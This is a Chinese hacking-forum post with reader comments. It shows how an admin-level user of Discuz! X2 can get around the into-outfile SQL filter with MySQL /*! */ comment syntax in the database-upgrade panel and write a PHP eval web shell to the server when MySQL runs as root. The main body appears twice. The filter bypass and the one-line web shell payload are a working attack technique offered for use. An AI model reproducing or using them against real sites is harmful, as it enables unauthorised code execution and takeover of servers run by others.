Discuz X2 后台getshell 鸡肋
作者:yesu
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长---数据库---升级
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
最近帮朋友看了一个站,DZx2的,拿到了创始人都没办法getshell
百度无果,自己本地架设了一下
1,当mysql是root时
站长---数据库---升级
尝试
select '1' into outfile 'E:\2.txt'
会提示
[Type] 查询语句安全威胁
[Query] select '1' into outfile 'E:\2.txt'
为什么会这样呢?
\config\config_global.php中
限制了into outfile函数
尝试绕过
/*!select*/ '1' /*!into outfile*/ 'E:\3.txt'
Discuz! 数据结构升级成功,影响的记录行数 1
如果要导出一句话,即
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'E:\3.php'
注意:一句话密码不要有引号
关于作者
评论35次
还真别说,很多大站还都是root权限,以前看51cto,root权限,各种跨目录,各种上传,分站多了百密一疏
没什么实质效果啊
outfile 面对GPC有root都很无力啊
对于现在多数不是撸权限的,表示鸭梨很大啊
不解释
这个尼玛要顶~~~~
一般都不是root权限,确实鸡肋
插。。。上次那个DZ的注入我记得不是补了?。。。居然真的行。。。
这个可以绕过?!!!DZ不是对这个/*!也过滤了么?!
收下了 嘿嘿
鸡肋。。学xi了。。
终于牛逼的出现了。。。 只是root是个很鸡肋的问题啊。。
鸡肋?不太懂。
跟前几天的那个mysql提权似的,都要outfile,一旦有这权限,getshell+提权一块搞了
鸡肋就是root?